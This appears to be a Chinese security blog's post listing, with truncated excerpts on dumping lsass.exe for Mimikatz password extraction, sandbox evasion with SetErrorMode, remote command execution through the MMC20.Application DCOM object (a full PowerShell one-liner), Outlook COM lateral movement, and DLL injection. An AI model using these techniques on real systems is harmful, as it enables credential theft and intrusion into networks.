- 博客(6)
- 资源 (7)
- 收藏
- 关注
原创 从dump文件中读取开机密码
通过vbs脚本创建lsass.exe进程dump文件,使用Mimikatz从dump文件中读取电脑密码!使用方法:cscript.exe test.vbs lsass.exe脚本代码:Option ExplicitConst SW_HIDE = 0If (WScript.Arguments.Count <> 1) Then WScript.StdOut.Writ...
2019-08-31 22:41:42 1282
原创 病毒使用SetErrorMode检测沙箱的小技巧
以前分析GandCrab v5.2时,该样本通过SetErrorMode函数来检测是否运行在沙箱环境,具体代码如下:程序入口逻辑:写了个简单的demo,上传大cuckoosandbox沙箱中#include "stdafx.h"#include <windows.h>int _tmain(int argc, _TCHAR* argv[]){ SetErrorM...
2019-08-29 17:12:18 1167
原创 使用DCOM对象的ExecuteShellCommand方法执行系统命令
[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","这里替换成你的IP")).Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\Calc.exe","0","0","0")效果:参考链接:https://ha...
2019-08-29 13:41:31 1172
原创 使用Outlook的CreateObject方法和DotNetToJScript横向渗透
原理:通过powershell调用Outlook的DCOM组件,可以执行js脚本,原文中的demo是结合DotNetToJScript框架+C#程序来做的,我这里比较懒,直接用js写的脚本。由于是COM调用,所以进程链关系不会关联到powershell。通过Process Monitor等工具也监控不到相关日志。运行效果图:Powershell代码:$com = [Type]::GetT...
2019-08-26 19:15:52 599
原创 企业内网渗透横向攻击的一种思路
以前老东家有个员工不小心点开了Emotet木马,不久后,全体员工收到了一封带有病毒附件的钓鱼邮件,发件人账号正式该员工的邮件账户。最近在看Black Hat USA 2019大会 第一天的PPT,其中一篇主题《us-19-Joly-Hunting-For-Bugs-Catching-Dragons.pdf》里面介绍了使用C#调用Outlook的COM库,并以当前登陆邮件账户,给指定邮箱发送邮件...
2019-08-09 12:59:55 2241
原创 Win7x64通过ClientLoadLibrary注入DLL
测试程序cpp文件:// ClientLoadlibrary.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include <windows.h>typedef struct _CLientLoadLibraryParam{ DWORD dwSize;//+0 DWORD dwStringLength; //+4...
2019-08-04 17:52:41 863
Windows.Internals.Part.1.7th.Edition
2018-03-23
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人